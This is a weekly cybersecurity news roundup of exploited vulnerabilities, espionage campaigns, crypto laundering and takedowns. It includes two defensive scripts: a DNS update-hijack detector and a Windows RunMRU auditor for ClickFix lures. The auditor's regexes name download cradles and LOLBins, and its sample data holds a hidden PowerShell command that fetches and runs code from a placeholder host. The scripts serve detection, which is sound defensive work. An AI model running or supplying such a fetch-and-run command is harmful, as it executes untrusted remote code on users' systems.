Fortinet has released security updates to address a FortiWeb zero-day vulnerability that attackers are already exploiting in the wild. The flaw, tracked as CVE-2025-58034, is a critical OS command injection issue, which allows authenticated threat actors to execute unauthorized code on affected FortiWeb web application firewall appliances. Administrators are strongly advised to upgrade their FortiWeb devices immediately to the latest software versions to prevent ongoing attacks.
Google has rolled out an emergency security update to address a zero-day vulnerability in the Chrome browser. This is the seventh Chrome zero-day flaw fixed by Google since the start of the year. Tracked as CVE-2025-13223, the flaw stems from a type-confusion issue within Chrome’s V8 JavaScript engine.
Cybersecurity company SonicWall has released patches for several vulnerabilities in its products. One of them is a SonicOS SSLVPN issue that can allow attackers to crash vulnerable firewalls. Tracked as CVE-2025-40601, the flaw is a stack-based buffer overflow affecting Gen7 and Gen8 (hardware and virtual) firewalls that can be used for denial-of-service attacks. Two other flaws (CVE-2025-40604 and CVE-2025-40605) are RCE and path traversal bugs. There are currently no reports of these vulnerabilities being exploited in the wild, nor of any public PoC code for them.
AhnLab SEcurity intelligence Center (ASEC) has published technical analysis of a ShadowPad malware campaign exploiting a remote code execution vulnerability in Microsoft Windows Server Update Services (WSUS), tracked as CVE-2025-59287.
A China-linked hacking group known as Autumn Dragon has been running a long-term espionage campaign against government and media organizations across Southeast Asia. The group mainly uses DLL sideloading to infiltrate systems and has recently increased its activity in countries around the South China Sea, including Indonesia, Singapore, the Philippines, Cambodia, and Laos. The attacks begin with an exploit for a WinRAR path-traversal vulnerability (CVE-2025-8088).
A new cyber-espionage campaign dubbed “Operation WrtHug” has compromised tens of thousands of ASUS routers worldwide. The operation, which appears to exclusively target ASUS WRT devices, mainly End-of-Life (EoL) models, uses known vulnerabilities to gain high-level control of the routers. Researchers say the attackers are exploiting a series of OS command injection vulnerabilities, including CVE-2023-41345, CVE-2023-41346, CVE-2023-41347, and CVE-2023-41348, which are collectively associated with CVE-2023-39780, another OS command injection flaw. Attackers also leveraged CVE-2024-12912 (an arbitrary command execution issue) and CVE-2025-2492 (an improper authentication control issue). The threat actors used the AiCloud service on ASUS devices as the initial access point.
RondoDox is targeting unpatched XWiki servers via a critical RCE flaw to add more devices to its botnet. The flaw (CVE-2025-24893) is a code injection issue in XWiki’s SolrSearch component that lets unauthenticated users execute arbitrary code by sending a crafted request. Although patches were released in February 2025 (versions 15.10.11, 16.4.1, and 16.5.0RC1), many servers remain unpatched.
Oligo Security reports that attackers are actively exploiting a two-year-old vulnerability in the Ray open-source AI framework (CVE-2023-48022) to compromise clusters using NVIDIA GPUs. The campaign, dubbed ShadowRay 2.0, uses the missing-authentication flaw to gain control of unprotected Ray instances. Once inside, attackers deploy XMRig to covertly mine cryptocurrency.
A new Mandiant report details TTPs observed in a targeted UNC1549 campaign against the aerospace, aviation, and defense industries in the Middle East.
China-linked APT24 has conducted a three-year espionage campaign using a new malware called ‘BadAudio.’ The malware has been delivered through spearphishing, supply-chain attacks, and watering-hole compromises. APT24 hijacked more than 20 legitimate public websites across multiple sectors, injecting JavaScript that targeted only Windows visitors. The injected script fingerprinted users and, when a visitor matched their criteria, displayed a fake software-update prompt to trick them into downloading the BadAudio malware.
A China-linked cyberespionage group known as PlushDaemon is hijacking software-update traffic using a network-level implant called ‘EdgeStepper.’ The tool is written in Go, compiled as an ELF binary, and designed to perform adversary-in-the-middle attacks. It intercepts DNS queries and checks whether they relate to software-update domains. If so, the query is rerouted to a malicious DNS node, which returns a link to a Windows downloader named ‘LittleDaemon,’ disguised as a benign DLL file. LittleDaemon then retrieves and launches a second-stage dropper called ‘DaemonicLogistics’ directly in memory.
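An implant of the EdgeStepper kind leaves one observable trace on the wire: an update host that suddenly resolves to an address it never used before. The script below is an added example (not code from the PlushDaemon report or from any vendor) of checking resolver logs for exactly that. The log layout, the update domains, the baseline networks and the sample lines are all constructed for the illustration; in practice the baseline would come from your own resolver history or an out-of-band lookup through a trusted DoH resolver.

```python
"""Flag DNS answers for software-update domains that fall outside a known-good baseline.

Added illustration, not code from the PlushDaemon/EdgeStepper report. The log format,
the update domains and the baseline networks are constructed for the example.
"""
import ipaddress
import re
from dataclasses import dataclass

# Constructed: update hosts worth watching (hypothetical names, not from the report).
UPDATE_DOMAINS = {"update.example-vendor.com", "dl.example-vendor.com"}

# Constructed baseline: networks each update host legitimately resolves into.
BASELINE = {
    "update.example-vendor.com": [ipaddress.ip_network("203.0.113.0/24")],
    "dl.example-vendor.com": [ipaddress.ip_network("198.51.100.0/24")],
}

# Addresses a public update host should never resolve to from a corporate client.
NON_ROUTABLE = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]

# Constructed log line layout: "<timestamp> <client> <qname> <qtype> <answer>"
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<qname>\S+)\s+(?P<qtype>A|AAAA)\s+(?P<answer>\S+)$")


@dataclass(frozen=True)
class Finding:
    ts: str
    client: str
    qname: str
    answer: str
    reason: str


def parse_line(line):
    """Return the fields of one log line, or None if it does not match the layout."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def check_record(rec):
    """Return a Finding if an update-domain answer looks hijacked, else None."""
    qname = rec["qname"].rstrip(".").lower()
    if qname not in UPDATE_DOMAINS:
        return None
    try:
        addr = ipaddress.ip_address(rec["answer"])
    except ValueError:
        return Finding(rec["ts"], rec["client"], qname, rec["answer"], "unparseable answer")
    if any(addr in net for net in NON_ROUTABLE):
        return Finding(rec["ts"], rec["client"], qname, rec["answer"],
                       "update host resolved to a non-routable address")
    if not any(addr in net for net in BASELINE.get(qname, [])):
        return Finding(rec["ts"], rec["client"], qname, rec["answer"],
                       "answer outside the baseline for this host")
    return None


def scan(lines):
    """Run every parseable line through check_record and collect the findings."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is not None:
            f = check_record(rec)
            if f is not None:
                findings.append(f)
    return findings


# Constructed sample resolver log, not captured traffic.
SAMPLE_LOG = [
    "2025-11-20T10:00:01Z 10.0.0.5 update.example-vendor.com A 203.0.113.17",
    "2025-11-20T10:00:02Z 10.0.0.5 www.example.org A 192.0.2.10",
    "2025-11-20T10:00:03Z 10.0.0.7 update.example-vendor.com A 192.0.2.44",
    "2025-11-20T10:00:04Z 10.0.0.9 dl.example-vendor.com. A 10.13.37.1",
    "not a log line",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.ts} {f.client} {f.qname} -> {f.answer}: {f.reason}")
```

On the sample log the first update-host answer is inside its baseline and passes; the third line resolves the update host to an address outside the baseline and the fourth resolves it to an RFC 1918 address, so both are reported. Because EdgeStepper rewrites the query upstream of the client, the client still believes it talked to its usual resolver; comparing answers, not resolver addresses, is what exposes the redirection.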
Amazon’s threat intelligence team has warned of a new rising trend observed in nation-state actors it describes as cyber-enabled kinetic targeting, in which digital intrusions blend with physical operations. Threat actors hide their origins through anonymizing VPN networks, operate from controlled server infrastructure, and breach critical enterprise systems such as CCTV networks and maritime platforms. By streaming real-time data from compromised cameras and sensors, they gather live intelligence that can be used to adjust targeting in near real time.
The Iranian state-sponsored hacking group APT42 has expanded an espionage campaign aimed at senior defense and government officials. The campaign, dubbed “SpearSpecter,” relies on social engineering, with attackers spending days or even weeks building rapport through social media, public databases, and professional networks. Israel’s National Digital Agency (INDA) notes that the hackers often impersonate colleagues or contacts to lure victims into “exclusive” conferences or strategic meetings, sometimes extending the ruse through multiple WhatsApp conversations to build credibility.
A new campaign, dubbed “EVALUSION,” is leveraging the ClickFix social-engineering technique to deliver the Amatera Stealer and NetSupport RAT malware. The campaign tricks users into running malicious commands via the Windows Run dialog under the guise of completing a reCAPTCHA verification.
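Because ClickFix has the victim paste the command into the Win+R dialog, Explorer records it in the per-user RunMRU key, which makes that key a cheap artifact to check during triage. The script below is an added example, not code from the EVALUSION report or from any vendor: it scores RunMRU entries against a handful of heuristics (encoded or hidden PowerShell, download cradles, LOLBins with URLs, and the fake-captcha comment text these lures typically append). The rule set and the SAMPLE_MRU dump are constructed for the illustration; on a Windows host the script reads the live key instead.

```python
"""Audit Windows Run-dialog history (HKCU\\Software\\...\\Explorer\\RunMRU) for ClickFix-style commands.

Added example, not code from the EVALUSION report or any vendor. The scoring rules are
heuristics chosen for this illustration and SAMPLE_MRU is a constructed dump, not data
from a real host.
"""
import re
import sys

# Each rule: (label, compiled regex). Heuristics, not a vendor signature set.
RULES = [
    ("encoded powershell",
     re.compile(r"powershell[^|]*\s-(?:e|ec|enc|encodedcommand)\b", re.I)),
    ("hidden/bypass powershell",
     re.compile(r"powershell.*?(?:-w(?:indowstyle)?\s+hidden|-ep\s+bypass|-executionpolicy\s+bypass)", re.I)),
    ("download-and-run cradle",
     re.compile(r"\b(?:iex|invoke-expression|irm|invoke-restmethod|invoke-webrequest|iwr|curl|wget)\b", re.I)),
    ("mshta/regsvr32/rundll32 with URL",
     re.compile(r"\b(?:mshta|regsvr32|rundll32)\b.*https?://", re.I)),
    ("certutil/bitsadmin download",
     re.compile(r"\b(?:certutil\s+-urlcache|bitsadmin\s+/transfer)\b", re.I)),
    ("captcha/verification lure text",
     re.compile(r"(?:not a robot|captcha|verification id|human verification)", re.I)),
    ("long base64 blob", re.compile(r"[A-Za-z0-9+/]{60,}={0,2}")),
]


def strip_mru_suffix(value):
    """Explorer stores each RunMRU entry as '<command>\\1'; drop that marker."""
    return value[:-2] if value.endswith("\\1") else value


def score_command(cmd):
    """Return the labels of every rule the command matches (empty list if clean)."""
    return [label for label, rx in RULES if rx.search(cmd)]


def audit(mru):
    """mru: dict of value-name -> data as read from RunMRU, including 'MRUList'.
    Returns findings ordered most-recent-first, following MRUList."""
    order = mru.get("MRUList", "")
    names = [n for n in order if n in mru]
    names += [n for n in mru if n != "MRUList" and n not in order]
    findings = []
    for name in names:
        cmd = strip_mru_suffix(mru[name])
        hits = score_command(cmd)
        if hits:
            findings.append({"slot": name, "command": cmd, "indicators": hits})
    return findings


def read_runmru_from_registry():
    """Read the live key for the current user (Windows only)."""
    import winreg
    path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
    out = {}
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, path) as key:
        i = 0
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, i)
            except OSError:
                break
            out[name] = data
            i += 1
    return out


# Constructed dump of a RunMRU key, not from a real machine.
SAMPLE_MRU = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": "powershell -w hidden -c \"iex (irm https://example.invalid/v.txt)\""
         " # \u2705 I am not a robot - reCAPTCHA Verification ID: 7391\\1",
}

if __name__ == "__main__":
    data = read_runmru_from_registry() if sys.platform == "win32" else SAMPLE_MRU
    for f in audit(data):
        print(f["slot"], f["indicators"], f["command"])
```

RunMRU only holds what was typed into the Run dialog, so this catches the Win+R variant of ClickFix and not lures that route the paste through a terminal or PowerShell window; for those, PowerShell script-block logging and command-line auditing are the equivalent artifacts. The lure-text rule is deliberately included because the trailing "I am not a robot" comment is what makes the pasted line look like a verification step to the victim, and it survives into the history verbatim.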
Acronis Threat Research Unit discovered a global malvertising and SEO-driven campaign called “TamperedChef.” It tricks users into downloading fake installers that look like common apps and that install hidden JavaScript-based remote-control tools. The attackers use social engineering, misleading ads, SEO, and abused digital certificates to appear trustworthy and avoid detection. The campaign is likely financially motivated, with goals including establishing and selling remote access for profit, stealing valuable data (especially healthcare information), staging systems for future ransomware attacks, and spying on high-value targets.
Hundreds of millions of dollars’ worth of cryptocurrency continued moving through major exchanges even after they paid hefty penalties and came under court-appointed supervision, according to a new international investigation. The International Consortium of Investigative Journalists (ICIJ) released The Coin Laundry, a report based on more than 10 months of work by reporters in 35 countries. Investigators collected hundreds of crypto wallet addresses linked to North Korean cybercrime groups, Russian money launderers and large-scale scam operations.
A new report from blockchain analytics firm Elliptic warns that sanctioned individuals, entities and even nation-states are increasingly turning to stablecoins to bypass global financial restrictions. The company found that sanctioned individuals increasingly rely on networks of OTC brokers and high-risk virtual asset service providers (VASPs) to convert fiat into stablecoins, move funds across borders and hide transaction origins. Red flags include sudden large stablecoin transfers from unregulated VASPs, exposure to wallets linked to sanctioned entities, and high-value trading with no believable business reason.
The United States, the UK, and Australia imposed sanctions on several Russian bulletproof hosting providers accused of supporting ransomware gangs and other cybercriminal operations.
Investigators at the UK’s National Crime Agency say money from Britain’s local drug trade was funneled through a bank linked to Russian intelligence and the sanctioned defense sector. The probe, called ‘Operation Destabilise,’ found more links between two major Russian money-laundering networks (SMART and TGR) and a Bulgarian spy ring jailed earlier this year. The six spies, allegedly directed by fugitive ex-Wirecard executive Jan Marsalek, had gathered information for Russian intelligence. The laundering network was also used to buy Keremet Bank in Kyrgyzstan, which has been sanctioned by the US and UK for helping Russia evade trade sanctions.
Dutch law enforcement has taken offline the criminal hosting service known as CrazyRDP, seizing thousands of servers allegedly used to facilitate ransomware attacks, botnets, phishing schemes, and the distribution of child sexual abuse material (CSAM).
The US Justice Department announced five guilty pleas connected to a scheme that allowed North Korean IT workers to fraudulently secure remote jobs at American companies, generating more than $2.2 million for the sanctioned regime and affecting at least 136 US firms.
The founders of the Samourai Wallet cryptocurrency mixing service have been sent to prison for helping criminals launder over $237 million. CEO Keonne Rodriguez was given a five-year prison sentence, and CTO William Lonergan Hill got four years. After serving their sentences, both will be supervised for three more years and must each pay a $250,000 fine.
Major unlicensed streaming site Photocall has been shut down following a joint operation by the Alliance for Creativity and Entertainment and DAZN. The platform provided access to over 1,000 TV channels in 60 countries, including premium sports like MotoGP, the NFL, the NHL, and international tennis. It drew roughly 26 million visits a year, with most users coming from Spain, followed by Mexico, Germany, Italy, and the US.